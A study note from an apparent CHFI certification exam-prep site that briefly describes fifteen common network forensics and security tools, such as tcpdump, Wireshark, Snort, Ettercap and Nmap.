EC-Council: Computer Hacking Forensic Investigator(CHFI-V10)
Module 8 : Network Forensics
         
Notes available : 7 You are not logged in.
Please Login for track your learning progress
   
 
Sl.No: 1 | 2 | 3 | 4 | 5 | 6 | 7 |
Go to Note No.



Bookmark this Note
Note ID: 108

Commonly using Network Forensics Tools


If you want to share the link of this note, please click here to "Copy note link" and share that generated link. Link from URL may change in future.
 


Various tools are available for Network forensics to investigate network attacks. Network forensic tools are incredibly useful when it comes to evidence collection, especially in a day and age when most people are constantly within reach of a cell phone, laptop and other technology. Here listing few commonly using Network forensics tools

1. tcpdump

Tcpdump is a popular command line tool available for capturing and analyzing network traffic primarily on Unix based systems. Using tcpdump, we can capture the traffic and store the results in a file that is compatible with tools like Wireshark for further analysis. Tcpdump can either be used to do a quick packet capture for troubleshooting or for capturing traffic continuously in large volumes for future analysis

2. Wireshark

It would be a surprise if someone worked in the Cyber Security field and not heard of the tool Wireshark. Wireshark is an open-source tool available for capturing and analyzing traffic with support for applying filters using the graphical user interface. On the system, where Wireshark is running one can choose the interface on which traffic needs to be captured.

3. HELIX3

Reveal Internet abuse, data sharing and harassment without detection using HELIX3. This software integrates into your network, providing visibility across the entire infrastructure. Features include compliance management, protection from employee malicious behavior, litigation support and more.

4. NetworkMiner

NetworkMiner isan open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files. NetworkMiner can also be used to capture live network traffic by sniffing a network interface.

5. Splunk

Splunk is a proprietary, portable, highly extensible log aggregation and analysis tool. Splunk performs capturing, indexing, and correlating the real time data in a searchable container and produces graphs, alerts, dashboards and visualizations. When it comes to network forensics, splunk plays a crucial role in providing evidence from various sources

6. ParabenE3 Digital Forensic

Paraben‘s E3:P2C isa tried-and-true computer forensic tool that supports a variety of digital data sources that include: file system, network email archives, local email archives, internet data, etc.

7. Snort

Snort is one of the most popular network Intrusion Detection Systems available for free. This open source detection software uses rules to define malicious network activity and generate alerts quickly when threats arise. There is a commercial version of Snort available, which is currently offered by Cisco.

8. Xplico

Xplico is a network forensics analysis tool (NFAT), which isa software that reconstructs the contents of acquisitions performed with a packet sniffer (e.g. Wireshark, tcpdump, Netsniff-ng).

9. CurrPorts

CurrPorts is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer

10. Capsa

Capsa is a network analyzer tool that helps network administrators monitor, troubleshoot, and analyze wired and wireless networks.Capsa is an intuitive network analyzer, which provides detailed information to help check if there are any Trojan activities on a network.

11. AirSnort

AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. 802.11b, using the Wired Equivalent Protocol (WEP), is crippled with numerous security flaws.

12. Ettercap

Ettercap is a suite for adversary-in-the-middle attacks on LAN that includes sniffing of live connections, content filtering on the fly, and many other features. It supports active and passive dissection of many protocols (including ciphered protocols) and includes many features for network and host analysis. It is a free and open source tool that can launch Man-in-the-Middle attacks. You can use this tool for network analysis and security auditing and it can be run on various operation systems, like Linux, BSD, Mac OS X and Windows. Ettercap can sniff network traffic, capture passwords, etc.

13. dsniff


As the name implies, dsniff is a network sniffer, but it can also be used to disrupt the normal behavior of switched networks and cause network traffic from other hosts on the same network segment to be visible, not just traffic involving the host dsniff is running on.

14. SmartWhois

SmartWhois is a useful network information utility that allows you to look up all the available information about an IP address, hostname or domain, including country, state or province, city, name of the network provider, administrator and technical support contact information.

15. NMAP

Nmap isa network scanning tool—an open source Linux command-line tool—used for network exploration, host discovery, and security auditing. Gordon Lyon (pseudonym Fyodor Vaskovich) created it to help map an entire network easily and find its open ports and services.



  Go to notes  






WELCOME TO ONLINE EXAM PREPARATION SYSTEM

Certification Examinations